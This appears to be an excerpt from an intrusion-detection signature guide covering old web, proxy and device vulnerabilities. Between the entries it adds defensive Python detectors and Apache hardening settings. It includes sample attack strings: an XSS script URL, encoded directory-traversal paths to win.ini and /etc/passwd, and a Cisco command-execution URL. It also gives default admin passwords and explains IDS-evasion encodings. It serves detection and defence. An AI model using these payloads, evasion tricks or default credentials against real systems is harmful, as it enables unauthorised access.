Threat Level: Warning
Industry ID: CVE-2002-0068 Bugtraq: 4148 Nessus: 10923
Signature Description: Squid is a free proxy server. A buffer overflow exists in the Squid proxy server's FTP URL
handling. If a user has the ability to use the Squid process to proxy FTP requests, it may be possible for the user to make a
malicious request. By sending a custom-crafted ftp:// URL through the Squid proxy, it is possible to crash the server,
requiring a manual restart to resume normal operation. This rule detects such a buffer overflow attempt.
Signature ID: 442
DCShop exposes sensitive files - orders.txt file access vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0821 Bugtraq: 2889
Signature Description: DCShop is a CGI-based ecommerce system from DCScripts. DCShop beta version 1.002
does not properly protect user and credit card information. This rule triggers if a request is made to access orders.txt
in the dcshop/orders directory, which includes all recent orders, including the end-user's name, shipping and billing address, e-mail address and CREDIT CARD NUMBERS with expiry dates in plain text format.
Signature ID: 443
DCForum DCShop File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0821 Bugtraq: 2889
Signature Description: DCShop is a CGI-based ecommerce system from DCScripts. DCShop beta version 1.002
does not properly protect user and credit card information. This rule triggers if a request is made to access
auth_user_file.txt in the dcshop/auth_data directory, which contains the administrator name and password in plain text
format.
Signature ID: 444
Double Nibble Encoding vulnerability
Threat Level: Information
Signature Description: Double nibble hex encoding is based on the standard hex encoding method. Each hexadecimal
nibble value is encoded using the standard hex encoding. For example, to encode a capital A, the encoding would be
%%34%31. The normal hex encoding for A is %41. So, the first nibble, 4, is encoded as %34 (the ASCII value for the
numeral 4), and the second nibble, 1, is encoded as %31 (the ASCII value for the numeral 1).
Signature ID: 445
Double Percent Hex encoding vulnerability
Threat Level: Information
Signature Description: Double percent hex encoding is based on the normal method of hex encoding. The percent is
encoded using hex encoding, followed by the hexadecimal byte value to be encoded. To encode a capital A, the
encoding is %2541. As can be seen, the percent is encoded as %25 (this equals a '%'). The value is then decoded
again, with the value this time being %41 (this equals the 'A'). This encoding is supported by Microsoft IIS. NOTE:
Even though some administrators use double percent encoding in URLs, it is not widely used, and it is
considered a well-known evasion technique. Please ignore this log if the double percent encoding is purposefully
Signature ID: 446
IIS %u Unicode wide character encoding vulnerability
Threat Level: Information
Industry ID: CVE-2001-0669 Bugtraq: 3292
Signature Description: Microsoft Internet Information Server (IIS) allows wide characters to be Unicode encoded in
URL requests in a format that uses "%u". Such encoded characters appear as "%uXXXX", where "XXXX" represents
hexadecimal characters (0-9, A-F). For example, the character 'b' can be encoded as "%u0062". A remote attacker can
use this form of encoding to attempt to bypass intrusion detection systems (IDS) / intrusion prevention
systems (IPS). Many public ".ida" overflow exploits (including the CodeRed worms) use this type of encoding when
executing a buffer overflow attempt.
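The three encoding forms described for signatures 444, 445 and 446 (double nibble, double percent and the IIS %u form) all collapse to the same plain characters once a decoder is applied repeatedly, which is why an IDS canonicalizes a request path before matching it. The Python below is an added example, not code from this guide or from the ProCurve module: it decodes a path to a fixed point and reports how many passes changed it, so that a request relying on a layered encoding can be flagged. The sample paths are constructed.

```python
"""Canonicalize URL-encoded request paths the way an IDS must before matching.

Added example; not code from the ProCurve guide.  Handles the encodings
described for signatures 444-446: standard %HH, double percent (%2541),
double nibble (%%34%31) and the IIS wide-character form %u0041.
"""
import re

_HEX2 = re.compile(r"%([0-9A-Fa-f]{2})")      # %HH
_WIDE = re.compile(r"%u([0-9A-Fa-f]{4})")     # %uXXXX (IIS only)


def decode_once(s: str) -> str:
    """Apply one decoding pass.  A '%' that is not followed by a valid
    sequence (e.g. the first '%' of '%%34%31') is passed through unchanged."""
    s = _WIDE.sub(lambda m: chr(int(m.group(1), 16)), s)
    return _HEX2.sub(lambda m: chr(int(m.group(1), 16)), s)


def normalize(path: str, max_rounds: int = 4):
    """Decode until the string stops changing.

    Returns (canonical_path, depth) where depth is the number of passes
    that changed something: 0 = no encoding, 1 = ordinary %HH or %u,
    >= 2 = a layered encoding such as double percent or double nibble.
    """
    depth = 0
    for _ in range(max_rounds):
        decoded = decode_once(path)
        if decoded == path:
            break
        path, depth = decoded, depth + 1
    return path, depth


def analyze(path: str) -> dict:
    """Summarize what a detection engine would want to know about a path."""
    canonical, depth = normalize(path)
    return {
        "canonical": canonical,
        "depth": depth,
        "wide_char": _WIDE.search(path) is not None,  # %u form, IIS-specific
        "layered": depth >= 2,                          # evasion-style encoding
    }


if __name__ == "__main__":
    # Constructed sample paths covering each encoding from the signature text.
    for sample in ["/index.html", "/%41dmin", "/%2541dmin",
                   "/%%34%31dmin", "/%u0062in/ls"]:
        print(sample, "->", analyze(sample))
```

A depth of 2 or more means the request used double percent or double nibble encoding. A literal '%' that a client legitimately sends as %25 decodes the same way, which is the caveat behind the NOTE on signature 445: the event is only meaningful where layered encoding is not used on purpose.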
Signature ID: 524
DHCP server info gathering
Threat Level: Warning
Nessus: 10663
Signature Description: Dynamic Host Configuration Protocol (DHCP) is a protocol used by networked devices
(clients) to obtain the parameters necessary for operation in an Internet Protocol network. This protocol reduces system
administration workload, allowing devices to be added to the network with little or no manual configuration. Some
DHCP servers provide sensitive information such as the NIS domain name, or network layout information such as the
list of the network's www servers, and so on. Using such information, an attacker may focus future attacks on the
network. A DHCP server should not be reachable from an external network.
Signature ID: 525
Microsoft Exchange Public Folders Information Leak vulnerability
Threat Level: Information
Nessus: 10755
Signature Description: Public folders are a part of the Microsoft Exchange information store that anyone can access.
The public folders are usually set up so that everyone has read access, but only one or two people have the authority to
add, remove, or change folder content. Microsoft Exchange Public Folders can be set to allow anonymous
connections (set by default). While an administrator may disable the "Find Users" feature, an attacker can use this
vulnerability to gain critical information about the users (such as full e-mail address, phone numbers, etc.).
Signature ID: 526
Matt Wright FormMail Remote Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0357 CVE-1999-0172 Bugtraq: 2079,1187 Nessus: 10782
Signature Description: FormMail is a generic HTML form to e-mail gateway that parses the results of any form and
sends them to the specified users. This rule triggers when a request references a FormMail script on a remote host,
for example after an attacker creates a web page that links to the script and a user clicks the link. An attacker can gain
access, execute arbitrary commands on the victim's server and send anonymous e-mail by modifying the recipient and
message parameters. The affected versions of FormMail are 1.6 and earlier. The issue is fixed in FormMail 1.6 or later;
update to this version, available at the vendor's web site, to remove the issue.
Signature ID: 528
FormMail.cgi Information Disclosure Vulnerability
Threat Level: Information
Bugtraq: 1187
Signature Description: Matt Wright FormMail is a CGI utility script in Perl that provides form authors with a simple
mechanism to create and send both simple e-mail items and more complex e-mail. The affected versions of Matt
Wright FormMail are 1.6, 1.7, and 1.8. This rule triggers when a specially crafted HTTP request is sent to the
formmail.cgi script; a remote attacker can use this vulnerability to obtain sensitive information. This
issue is fixed in Matt Wright FormMail 1.9.
Signature ID: 551
Shopping Cart Arbitrary Command Execution vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0992 Bugtraq: 3308 Nessus: 10764
Signature Description: Hassan Consulting's Shopping Cart is commercial web store software. The Shopping Cart
allows your website to track visitors as they pass from page to page, keeping track of items clicked on and information
sent by the user. When the user exits, totals can be calculated and orders/data can be sent. Shopping Cart (Hassan
Consulting Shopping Cart version 1.23) does not filter certain types of user-supplied input from web requests. A remote
attacker could send a specially crafted URL request to the shop.pl script containing shell metacharacters in the page
parameter and use this vulnerability to execute arbitrary commands on the server. No remedy available as
of September, 2008.
Signature ID: 552
Web Server robots.txt Information Disclosure Vulnerability
Threat Level: Information
Nessus: 10302
Signature Description: The robots.txt file is commonly placed in the root directory of a system's web server to control
the actions of web robots (robots are programs that traverse many pages in the World Wide Web by recursively
retrieving linked pages). This rule triggers when the '/robots.txt' file is requested; an attacker can
use this file to learn about sensitive locations and directories on the affected site.
Signature ID: 557
WhatsUp Gold Default Admin Account vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0508 CVE-1999-0508 Nessus: 11004,10747
Signature Description: WhatsUp Gold is an easy-to-use tool for monitoring TCP/IP, NetBIOS, and IPX networks.
WhatsUp Gold initiates both visible and audible alarms when monitored devices and system services go down.
WhatsUp Gold provides a web interface so you can view network status from a web browser on any computer on the
Internet. It ships with a default password for the admin user account. An attacker can use this vulnerability to probe other
systems on the network and obtain sensitive information.
Signature ID: 558
Linksys Router Default Password vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0508 Nessus: 10999,10747
Signature Description: Linksys is a leader in VoIP, wireless routers and Ethernet networking for home, SOHO and
small business users. It provides effortless and economical sharing of broadband Internet connections, files, printers,
digital music, videos, photos and gaming over a wired or wireless network. By default, Linksys routers install with a
default password: the administrative account has the password 'admin', which is publicly known and documented. An
attacker can use this vulnerability to reconfigure the router and trivially access the program or system.
Signature ID: 559
40X HTML Cross Site Scripting vulnerability
Threat Level: Information
Nessus: 10643
Signature Description: Cross-site scripting is a type of computer security vulnerability typically found in web
applications which allows code injection by malicious web users into the web pages viewed by other users. An exploited
cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. This
signature generates an event when an attacker tries to exploit web applications by using the
"info('Can%20Cross%20Site%20Attack')" pattern.
Signature ID: 560
Apache /server-info accessible Vulnerability
Threat Level: Information
Nessus: 10678
Signature Description: Apache is an open source web server that is distributed free. It runs on Unix, Linux, Solaris and
Windows operating systems. This rule triggers when the URL '/server-info' is requested. Successful
exploitation allows an attacker to disclose information about the server's configuration, such as installed modules,
their configuration and assorted run-time settings.
Signature ID: 561
Apache /server-status Information Disclosure Vulnerability
Threat Level: Information
Nessus: 10677
Signature Description: Apache is an open source web server that is distributed free. It runs on Unix, Linux, Solaris and
Windows operating systems. Server-status is a built-in Apache HTTP Server handler used to retrieve the server's status
report. This rule triggers when a specially crafted URL request is sent to the '/server-status' handler. A
successful exploitation of this will allow an attacker to obtain sensitive information.
Signature ID: 562
Red Hat Linux Apache Remote Username Enumeration Vulnerability
Threat Level: Critical
Industry ID: CVE-2001-1013 Bugtraq: 3335 Nessus: 10766
Signature Description: Apache is an open source web server that is distributed free. It runs on Unix, Linux, Solaris and
Windows operating systems. This rule triggers when a request is made for a user's default home page. One of three
messages is displayed depending on whether the specified user name exists and has a home page configured, exists but
has no home page configured, or does not exist on the system. An attacker can use this vulnerability to determine valid
usernames on the system. The affected versions are Apache HTTP Server and Red Hat Linux 7.0. No remedy available
as of September, 2008. This rule detects requests where the user name is 'root'.
Signature ID: 563
Red Hat Linux Apache Remote Username Enumeration Vulnerability(1)
Threat Level: Critical
Industry ID: CVE-2001-1013 Bugtraq: 3335 Nessus: 10766
Signature Description: Apache is an open source web server that is distributed free. It runs on Unix, Linux, Solaris and
Windows operating systems. This rule triggers when a request is made for a user's default home page. One of three
messages is displayed depending on whether the specified user name exists and has a home page configured, exists but
has no home page configured, or does not exist on the system. An attacker can use this vulnerability to determine valid
usernames on the system. The affected versions are Apache HTTP Server and Red Hat Linux 7.0. No remedy available
as of September, 2008. This signature detects requests where the user name is 'ann_foo_fighter'.
Signature ID: 564
Cisco Catalyst Web Execution vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0945 Bugtraq: 1846 Nessus: 10545
Signature Description: The Cisco Catalyst 3500 Series XL is a scalable line of stackable 10/100 and Gigabit Ethernet
switches. The web configuration interface for Catalyst 3500 XL switches allows remote attackers to execute arbitrary
commands without authentication when the enable password is not set, via a URL containing '/exec/' as in
/exec/show/config/cr. An attacker may use this flaw to cut your network access to the Internet, and may even lock you
out of the router.
Signature ID: 566
Tektronix PhaserLink Webserver Vulnerability
Threat Level: Information
Industry ID: CVE-1999-1508 CVE-2001-0484 Bugtraq: 2659,806 Nessus: 10146
Signature Description: Tektronix PhaserLink printers ship with a web server designed to help facilitate configuration of
the device. It can also completely modify the system characteristics, restart the machine, assign services, etc. This rule
triggers when undocumented URLs such as ncl_items.html are requested. If ncl_items.html exists on the
remote system, it allows an attacker to reconfigure the Tektronix printer, and an attacker can use this vulnerability to
gain administrator access. The affected version of the Tektronix PhaserLink printer is 840.0 and earlier.
Signature ID: 567
Cabletron Web View Administrative Access vulnerability
Threat Level: Warning
Nessus: 10962
Signature Description: The Cabletron WebView network management tool allows network managers to access a wide range
of functions from a point-and-click World Wide Web interface. This web software provides a graphical, real-time
representation of the front panel on the switch. It can allow users to interactively configure the switch, monitor its
status, and view statistical information. An attacker can use this vulnerability to gain information.
Signature ID: 568
AirConnect Default Password vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0508 CVE-1999-0508 Nessus: 10961,10747
Signature Description: AirConnect was created as a test bed for aspiring web designers and new companies that cannot
yet afford to finance their own hosting. AirConnect wireless access point installs with a default password. The
comcomcom account has a password of comcomcom which is publicly known and documented. This allows attackers
to gain full control over the wireless network settings.
Signature ID: 569
HTTP dangerous PUT method vulnerability
Threat Level: Critical
Bugtraq: 12141 Nessus: 10498
Signature Description: PUT is an HTTP (Hypertext Transfer Protocol, a communication protocol for the
transfer of information on the Internet) method. This method allows a client to upload new files to the web server. An
attacker can exploit this vulnerability to upload arbitrary web pages to the server and execute arbitrary code with the
privileges of the web server.
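Where the web server is Apache, the two information-disclosure handlers named in signatures 560 and 561 and the PUT upload path from signature 569 are closed off in the server configuration rather than only watched for on the wire. The fragment below is an added example written in Apache 2.4 syntax; it is not configuration from this guide or the ProCurve module, and the document root path is an assumption.

```apache
# Added example (Apache 2.4 directives), not configuration from the ProCurve guide.

# mod_status and mod_info: keep the handlers available to the administrator,
# but answer only requests from the local host (Require local is a 2.4
# mod_authz_host directive).  ExtendedStatus Off drops per-request detail.
<IfModule mod_status.c>
    ExtendedStatus Off
    <Location "/server-status">
        SetHandler server-status
        Require local
    </Location>
</IfModule>

<IfModule mod_info.c>
    <Location "/server-info">
        SetHandler server-info
        Require local
    </Location>
</IfModule>

# Refuse PUT, DELETE and every other method not listed on the document tree,
# so a client cannot upload files.  The path "/var/www/html" is assumed.
<Directory "/var/www/html">
    <LimitExcept GET POST HEAD OPTIONS>
        Require all denied
    </LimitExcept>
</Directory>
```

After reloading, a request for /server-status from anywhere but the loopback interface receives 403, as does a PUT against the document tree; an IDS event for signature 560, 561 or 569 then records an attempt rather than a disclosure.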
Signature ID: 570
IIS SHTML Cross Site vulnerability
Threat Level: Information
Nessus: 10624
Signature Description: This IIS server vulnerability is caused when the server parses files with the SHTML extension. Using
specially designed URLs, IIS 5.0 may return user-specified content to the browser. This poses a great security risk,
especially if the browser is JavaScript enabled, and the problem is greater in IE. The following
URL: http://iis5server/<SCRIPT>alert('document.domain='+document.domain)</SCRIPT>.shtml executes in
the browser JavaScript provided by "iis5server" but defined by a (malicious) user.
Signature ID: 572
Lotus Domino information disclosure vulnerability
Threat Level: Severe
Nessus: 10057
Signature Description: Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration
capabilities, and a custom application platform. Lotus Domino 5.0 to 5.0.8 (inclusive) contains a flaw that may lead to an
unauthorized information disclosure. The issue is triggered when a user attempts to browse a directory, which will
disclose the names and locations of the Notes databases, resulting in a loss of confidentiality. It is possible to browse the
remote web server directories by appending ?open at the end of the URL.
Signature ID: 574
BEA Systems WebLogic Server Directory Traversal %5c Vulnerability
Threat Level: Warning
Bugtraq: 2513 Nessus: 10698
Signature Description: BEA Systems WebLogic Server is an enterprise-level web and wireless application server. It
provides easily surfaced diagnostics information, a GUI administration console, and command-line scripting. BEA
WebLogic Server (BEA WebLogic Server version 6.0) could allow an attacker to browse directories on the web server.
An attacker can request a URL followed by a specific ASCII representation, such as "%5c". This vulnerability could
allow a user to gain access to various files and reveal sensitive data. Upgrade to the latest version of WebLogic, available
at the vendor's website.
Signature ID: 575
BEA Systems WebLogic Server Directory Traversal %2f Vulnerability
Threat Level: Warning
Bugtraq: 2513 Nessus: 10698
Signature Description: BEA Systems WebLogic Server is an enterprise-level web and wireless application server. It
provides easily surfaced diagnostics information, a GUI administration console, and command-line scripting. BEA
WebLogic Server (BEA WebLogic Server version 6.0) could allow an attacker to browse directories on the web server.
An attacker can request a URL followed by a specific ASCII representation, such as "%2f". This vulnerability could
allow a user to gain access to various files and reveal sensitive data. Upgrade to the latest version of WebLogic, available
at the vendor's website.
Signature ID: 576
BEA Systems WebLogic Server Directory Traversal %2e Vulnerability
Threat Level: Warning
Bugtraq: 2513 Nessus: 10698
Signature Description: BEA Systems WebLogic Server is an enterprise-level web and wireless application server. It
provides easily surfaced diagnostics information, a GUI administration console, and command-line scripting. BEA
WebLogic Server (BEA WebLogic Server version 6.0) could allow an attacker to browse directories on the web server.
An attacker can request a URL followed by a specific ASCII representation, such as "%2e". This vulnerability could
allow a user to gain access to various files and reveal sensitive data. Upgrade to the latest version of WebLogic, available
at the vendor's website.
Signature ID: 577
BEA Systems WebLogic Server Directory Traversal %00 Vulnerability
Threat Level: Warning
Bugtraq: 2513 Nessus: 10698
Signature Description: BEA Systems WebLogic Server is an enterprise-level web and wireless application server. It
provides easily surfaced diagnostics information, a GUI administration console, and command-line scripting. BEA
WebLogic Server (BEA WebLogic Server version 6.0) could allow an attacker to browse directories on the web server.
An attacker can request a URL followed by a specific ASCII representation, such as "%00". This vulnerability could
allow a user to gain access to various files and reveal sensitive data. Upgrade to the latest version of WebLogic, available
at the vendor's website.
Signature ID: 578
IPlanet CMS/Netscape Directory Server Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1075 Bugtraq: 1839 Nessus: 10683,10589
Signature Description: iPlanet was a product brand that was used jointly by Sun Microsystems and Netscape
Communications when delivering software and services. Netscape is a suite of software components for sharing,
accessing, and communicating information via intranets and the Internet. Netscape includes components for browsing,
e-mail, authoring HTML pages, and reading newsgroups. Netscape (iPlanet) Certificate Management System (Netscape
Directory Server version 4.12.0 and iPlanet CMS version 4.2.0) could allow a remote attacker to traverse directories on
the server. An attacker can request a specially crafted URL containing "dot dot" (\../) sequences in front of the file
name, which would allow the attacker to read or download any known file outside the web root. No remedy is available
for Netscape Directory Server. Upgrade to the latest version of iPlanet Certificate Management System (4.2 SP1 or later),
available at the vendor's website.
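Signatures 574 to 578 each match one encoded byte ('%5c', '%2f', '%2e', '%00') or a dot-dot sequence in the raw request. The Python below is an added example and not the module's rule logic: it flags those raw encodings the way the signatures do, then percent-decodes the path with the standard library and checks whether the resolved path climbs above the web root or carries a NUL truncation byte. The decoded check also catches a double-encoded variant ("%252e") that the raw string match alone misses. The sample request paths are constructed.

```python
"""Detect encoded directory-traversal attempts in request paths.

Added example, not code from the ProCurve guide.  Mirrors what signatures
574-578 look for (single encoded bytes in the raw request) and adds a
decoded-path check so that double-encoded traversals are also caught.
"""
from urllib.parse import unquote

# Raw-byte patterns the signatures key on, mapped to a finding label.
ENCODED_BYTES = {
    "%5c": "encoded-backslash",   # signature 574
    "%2f": "encoded-slash",       # signature 575
    "%2e": "encoded-dot",         # signature 576
    "%00": "encoded-nul",         # signature 577
}


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so that %252e (-> %2e -> '.') is resolved."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(decoded: str) -> bool:
    """True when '..' segments climb above the document root.  Backslashes
    are treated as separators because servers on Windows accept them."""
    depth = 0
    for segment in decoded.replace("\\", "/").split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def analyze(raw_path: str):
    """Return (decoded_path, findings) for one request path."""
    findings = []
    lowered = raw_path.lower()
    for token, label in ENCODED_BYTES.items():
        if token in lowered:
            findings.append(label)
    decoded = fully_decode(raw_path)
    if "\x00" in decoded:
        findings.append("null-byte")        # truncation trick (signature 577)
    if escapes_root(decoded):
        findings.append("escapes-root")     # dot-dot traversal (signature 578)
    return decoded, findings


if __name__ == "__main__":
    # Constructed sample request paths.
    for sample in ["/docs/guide.html", "/..%5c..%5cwinnt/win.ini",
                   "/index.jsp%00.html", "/%252e%252e/%252e%252e/etc/passwd"]:
        print(sample, "->", analyze(sample))
```

The last sample produces no "encoded-dot" finding because the raw request contains "%252e", not "%2e"; only the decoded-path check reports it, which is why a signature on a single encoded byte is best paired with normalization.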
Signature ID: 579
Arbitrary file read attempt from NTMail web interface
Threat Level: Information
Industry ID: CVE-1999-0927 Bugtraq: 0279
Signature Description: Gordano's NTMail is a Windows NT mail server program. One of its features is allowing
administrators to configure the server and users to read their e-mail with a web browser via a built-in web server.
Gordano NTMail 4.2 allows unauthorized access to sensitive information. A successful exploitation of this vulnerability
allows an attacker to access sensitive information on the vulnerable system. This issue is fixed in Gordano NTMail 4.3.
Administrators are advised to update to Gordano NTMail 4.3 or a later version to resolve this vulnerability.
Signature ID: 581
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), CON (keyboard and screen), etc. These DOS devices can be
accessed through the web server, and if this is done, a process is opened to handle the execution of the particular device
driver. The vulnerability is that this processing does not finish, and if more requests are made, the server will
no longer answer requests on port 80, resulting in a denial of service. This signature detects access to the first connected
serial port.
Signature ID: 582
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), CON (keyboard and screen), etc. These DOS devices can be
accessed through the web server, and if this is done, a process is opened to handle the execution of the particular device
driver. The vulnerability is that this processing does not finish, and if more requests are made, the server will
no longer answer requests on port 80, resulting in a denial of service. This signature detects access to the keyboard and
screen.
Signature ID: 583
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), PRN (first connected parallel port), etc. These DOS devices
can be accessed through the web server, and if this is done, a process is opened to handle the execution of the particular
device driver. The vulnerability is that this processing does not finish, and if more requests are made, the
server will no longer answer requests on port 80, resulting in a denial of service. This signature detects access to the first
connected parallel port.
Signature ID: 584
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), CON (keyboard and screen), CLOCK$, etc. These DOS devices can be accessed through the web server, and if this is done, a process is opened to handle the execution of
the particular device driver. The vulnerability is that this processing does not finish, and if more requests are
made, the server will no longer answer requests on port 80, resulting in a denial of service. This signature detects access
to the CLOCK$ device name.
Signature ID: 585
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), COM1 (serial port), etc. These DOS devices can be accessed
through the web server, and if this is done, a process is opened to handle the execution of the particular device driver. The
vulnerability is that this processing does not finish, and if more requests are made, the server will no longer
answer requests on port 80, resulting in a denial of service. This signature detects access to serial port 1.
Signature ID: 586
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), COM2 (serial port), etc. These DOS devices can be accessed
through the web server, and if this is done, a process is opened to handle the execution of the particular device driver. The
vulnerability is that this processing does not finish, and if more requests are made, the server will no longer
answer requests on port 80, resulting in a denial of service. This signature detects access to serial port 2.
Signature ID: 587
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), LPT1 (parallel port), etc. These DOS devices can be accessed
through the web server, and if this is done, a process is opened to handle the execution of the particular device driver. The
vulnerability is that this processing does not finish, and if more requests are made, the server will no longer
answer requests on port 80, resulting in a denial of service. This signature detects access to parallel port 1.
Signature ID: 588
MS-DOS Device Names Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0386 CVE-2001-0493 CVE-2001-0391 CVE-2001-0558 CVE-2002-0200 CVE-2000-01
CVE-2003-0016 CVE-2001-0602 CVE-2003-0421 CVE-2003-0502 Bugtraq:
1043,2575,2608,2622,2649,2704,3929,6659,6662 Nessus: 10930
Signature Description: This rule detects attempts to exploit the DOS device name (DDN) denial-of-service vulnerability on
DOS-based operating systems such as MS-DOS, Windows 95 and 98. DOS device names (DDNs) are reserved names for common input and output
devices, for example AUX (first connected serial port), LPT2 (parallel port), etc. These DOS devices can be accessed
through the web server, and if this is done, a process is opened to handle the execution of the particular device driver. The
vulnerability is that this processing does not finish, and if more requests are made, the server will no longer
answer requests on port 80, resulting in a denial of service. This signature detects access to parallel port 2.
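Signatures 581 to 588 each watch for one reserved name, and the operating system resolves a name with any extension (aux.htr, con.asp) to the same device. The Python below is an added example, not the module's rule logic: it reduces each path segment to its base name, compares it against the reserved set and runs that check over a few constructed request lines. The names the signatures list (AUX, CON, PRN, CLOCK$, COM1, COM2, LPT1, LPT2) are extended here to COM1 to COM9, LPT1 to LPT9 and NUL, which Windows also reserves; that extension is this example's assumption, not the guide's.

```python
"""Flag requests for MS-DOS device names (signatures 581-588).

Added example, not code from the ProCurve guide.  The reserved names the
signatures list (AUX, CON, PRN, CLOCK$, COM1/COM2, LPT1/LPT2) are extended
here to the full COM1-COM9 / LPT1-LPT9 range plus NUL, which Windows also
reserves; the extension is this example's assumption, not the guide's.
"""
from urllib.parse import unquote, urlsplit

DEVICE_NAMES = {"AUX", "CON", "PRN", "NUL", "CLOCK$"}
DEVICE_NAMES |= {f"COM{n}" for n in range(1, 10)}
DEVICE_NAMES |= {f"LPT{n}" for n in range(1, 10)}


def device_name_in_path(request_path: str):
    """Return the reserved device name a path resolves to, or None.

    Windows maps both NAME and NAME.ext to the device, so only the part of
    each path segment before the first dot matters.  The query string is
    ignored and percent-encoding is removed first.
    """
    decoded = unquote(urlsplit(request_path).path)
    for segment in decoded.replace("\\", "/").split("/"):
        base = segment.split(".", 1)[0].strip().upper()
        if base in DEVICE_NAMES:
            return base
    return None


def scan_request_lines(lines):
    """Run the check over HTTP request lines ('GET /path HTTP/1.0') and
    return (line_number, device) pairs for the ones that hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        parts = line.split()
        if len(parts) < 2:
            continue
        device = device_name_in_path(parts[1])
        if device:
            hits.append((number, device))
    return hits


# Constructed sample request lines (not real log data).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /scripts/aux.htr HTTP/1.0",
    "GET /cgi-bin/con.asp?x=1 HTTP/1.0",
    "GET /console/admin.html HTTP/1.0",
    "GET /images/clock$.gif HTTP/1.0",
    "GET /%4c%50%541.txt HTTP/1.0",
]

if __name__ == "__main__":
    for number, device in scan_request_lines(SAMPLE_REQUESTS):
        print(f"line {number}: {SAMPLE_REQUESTS[number - 1]!r} -> {device}")
```

Note that "/console/admin.html" is not a hit: the base name is "console", not "CON", so matching on the whole segment rather than on a substring keeps ordinary paths from triggering the rule. The last sample shows why decoding happens before the comparison; "%4c%50%54" is only "LPT" once unquoted.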
Signature ID: 591
PHP-Nuke sql_debug Information Disclosure vulnerability
Threat Level: Information
Industry ID: CVE-2002-2032 Bugtraq: 3906 Nessus: 10856
